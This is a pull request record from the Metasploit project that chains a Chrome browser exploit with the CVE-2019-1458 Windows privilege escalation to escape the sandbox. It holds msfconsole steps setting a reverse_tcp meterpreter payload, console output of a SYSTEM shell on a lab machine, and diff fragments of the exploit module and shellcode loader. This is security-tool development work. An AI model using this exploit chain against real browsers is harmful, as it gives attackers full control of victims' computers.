### PR TITLE
CVE-2019-1458 chrome sandbox escape

### PR DESCRIPTION
**Pull request by timwr**
This pull request demonstrates how https://github.com/rapid7/metasploit-framework/issues/13221 (aka WizardOpium?)
can be combined with any chrome exploit (in this case https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/browser/chrome_object_create.rb) in order to escape the sandbox.

## Verification

Install Google Chrome 69.0.3497.92 on Windows 7 SP1

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/browser/chrome_object_create`
- [ ] `set URIPATH /`
- [ ] `set payload windows/x64/meterpreter/reverse_tcp`
- [ ] `set LHOST 192.168.56.1`
- [ ] `set SRVHOST 192.168.56.1`
- [ ] `set DEBUG_EXPLOIT true`
- [ ] `run`
- [ ] Visit the URL with Chrome
- [ ] **Verify** you get a meterpreter shell as `SYSTEM`

e.g:
```
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/browser/chrome_object_create) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.6     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[*] 192.168.56.6     chrome_object_create - [*] Properties p15 and p4 overlap after conversion to dictionary mode
[*] 192.168.56.6     chrome_object_create - [*] ArrayBuffer @ 0x3bedac1ef20
[*] 192.168.56.6     chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
[+] 192.168.56.6     chrome_object_create - Sent stage2 exploit 20000
[*] 192.168.56.6     chrome_object_create - [*] payload addr: 0x233c741c000
[*] 192.168.56.6     chrome_object_create - [*] wasm_addr @ 0x631d5bb3288
[*] 192.168.56.6     chrome_object_create - [*] wasm_rwx @ 0x1e981130000
[*] 192.168.56.6     chrome_object_create - [*] div_addr @ 0x3d557ece828
[*] 192.168.56.6     chrome_object_create - [*] el_addr @ 0x3d557ece828
[*] 192.168.56.6     chrome_object_create - [*] Triggering...
[*] Sending stage (206403 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:49166) at 2020-04-22 18:29:15 +0800

msf5 exploit(multi/browser/chrome_object_create) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49166 (192.168.56.6)

msf5 exploit(multi/browser/chrome_object_create) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.92
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

### CODE REVIEW

**Comment by xaitax** [comment]
Will this be merged?

File: modules/exploits/multi/browser/chrome_object_create.rb [hunk 1]
```diff
@@ -50,9 +53,30 @@ def on_request_uri(cli, request)
...
 
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    uripath = datastore['URIPATH'] || get_resource
+    uripath += '/' unless uripath.end_with? '/'
+
+    if request.uri =~ %r{/payload$}
+      path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.bin'
+      loader_data = ::File.binread(path)
+      #loader_data = payload.encoded
+      #loader_data = "bbbb"
```
Comment (bcoles) [inline modules/exploits/multi/browser/chrome_object_create.rb:63]: It should be possible to use `exploit_data` ?

```suggestion
      loader_data = exploit_data('CVE-2019-1458', 'exploit.bin')
```

File: lib/msf/core/payload/windows/x64/addr_loader.rb [hunk 2]
```diff
@@ -0,0 +1,83 @@
...
+        and rsp, ~0xF          ;  Ensure RSP is 16 byte aligned
+        call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+        #{asm_block_api}
+      start:
+        pop rbp
+        #{asm_block_loader}
+    ^
+    loader = Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
+    offset_size = loader.index("AAAAAAAA")
+    offset_addr = loader.index("BBBBBBBB")
```
Comment (bcoles) [inline lib/msf/core/payload/windows/x64/addr_loader.rb:34]: Randomize?

File: modules/exploits/multi/browser/chrome_object_create.rb [hunk 3]
```diff
@@ -50,9 +53,30 @@ def on_request_uri(cli, request)
     end
 
     print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    uripath = datastore['URIPATH'] || get_resource
+    uripath += '/' unless uripath.end_with? '/'
+
+    if request.uri =~ %r{/payload$}
```
Comment (bcoles) [inline modules/exploits/multi/browser/chrome_object_create.rb:59]:
```suggestion
    if request.uri.to_s.end_with?('/payload')
```

**Comment by gwillcox-r7** [comment]
@timwr Is this still a WIP or is it okay if we go ahead and try get this to be landed?

**Comment by xaitax** [comment]
FYI: I successfully reproduced it and works well. 👍🏻

**Comment by timwr** [comment]
I'd be happy to see this landed if people find it interesting.
I think the only TODO (apart from docs) is that it requires the sRDI ConvertToShellcode.py project to build it: https://github.com/rapid7/metasploit-framework/pull/13305/files#diff-ea10fbed964eaada43006d9e5354d75eR8
In theory I could re-write the addr_loader part so that it takes a reflective dll as input (instead of shellcode) which would be fiddly but not impossible. Alternatively we just include decent instructions of how to build it in the README?

File: lib/msf/core/payload/windows/x64/addr_loader.rb (hunk 2 above)
Comment (timwr) [reply lib/msf/core/payload/windows/x64/addr_loader.rb:34]: So these are just placeholders so we know which part of the shellcode to replace with the actual address and size (of the second stage / lpe exploit) at runtime. It doesn't make any sense to randomise them.

**Comment by gwillcox-r7** [comment]
> In theory I could re-write the addr_loader part so that it takes a reflective dll as inpu

We don't currently have anything in master that uses sRDI, and the recent additions of Reflective DLL templates to the project, which should make it easier for people to add their own custom reflectively injected code and maintain it in the future. Spoke to @smcintyre-r7 and he also mentioned adding sRDI would mean another compiler dependency which we would like to remove if possible to reduce breakages down the line.

TLDR: Please recompile with support for reflective DLLs as this the direction the project has been headed for and is continuing in at the moment, so it would make the most sense to support them if possible. Sorry if this is a pain, but hopefully the templates and instructions at https://github.com/rapid7/metasploit-framework/tree/c44fb61c9a8a9be54b99a36f2c09f162fc64d261/external/source/rdll_template should help you out. @smcintyre-r7 did most of the work on this and I made some minor fixes so feel free to ask either of us if you get stuck and we can assist :)

**Comment by timwr** [comment]
Quick update on this: I have converted the project to use RDI, however I still need to re-write the assembly (in addr_loader.rb) so that it can reflectively load a DLL (rather than just execute shellcode).

**Comment by timwr** [comment]
Closed for https://github.com/rapid7/metasploit-framework/pull/13817

**Pull request closed without merging**